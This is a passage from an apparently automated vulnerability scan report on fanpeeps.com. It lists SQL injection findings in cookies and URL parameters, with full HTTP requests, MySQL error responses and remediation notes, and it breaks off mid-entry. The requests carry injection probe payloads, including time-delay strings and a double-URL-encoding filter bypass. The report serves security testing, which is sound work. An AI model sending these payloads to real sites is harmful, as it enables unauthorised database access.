1.17. http://fanpeeps.com/bg2.jpg [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /bg2.jpg

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /bg2.jpg HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/?action=news&pid=18&iid=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:32:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17299

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.18. http://fanpeeps.com/bg2.jpg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /bg2.jpg

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /bg2.jpg?1,0,0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.1.10.1305373774

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 11:50:03 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17318

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.19. http://fanpeeps.com/function.fopen [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /function.fopen

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /function.fopen'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17290

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.20. http://fanpeeps.com/function.fopen [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /function.fopen

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /function.fopen HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2',0,0,0)waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17952

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.21. http://fanpeeps.com/function.fopen [__utmc cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /function.fopen

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /function.fopen HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%2527; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18102

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.22. http://fanpeeps.com/function.fopen [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /function.fopen

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /function.fopen HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17181

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.23. http://fanpeeps.com/function.fopen [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /function.fopen

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload )waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /function.fopen?1)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:45:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17361

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.24. http://fanpeeps.com/greybox/AJS.js [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/AJS.js

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2',0,0)waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17272

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.25. http://fanpeeps.com/greybox/AJS.js [__utmb cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/AJS.js

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380';

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17300

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380'';

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.26. http://fanpeeps.com/greybox/AJS.js [__utmc cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/AJS.js

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936,0,0)waitfor%20delay'0%3a0%3a20'--; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17290

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.27. http://fanpeeps.com/greybox/AJS.js [__utmz cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/AJS.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17263

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 91517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.28. http://fanpeeps.com/greybox/AJS.js [__utmz cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/AJS.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:27 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17185

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.29. http://fanpeeps.com/greybox/gb_scripts.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /greybox'/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17392

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox''/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.30. http://fanpeeps.com/greybox/gb_scripts.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_scripts.js',0,0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:47:13 GMT
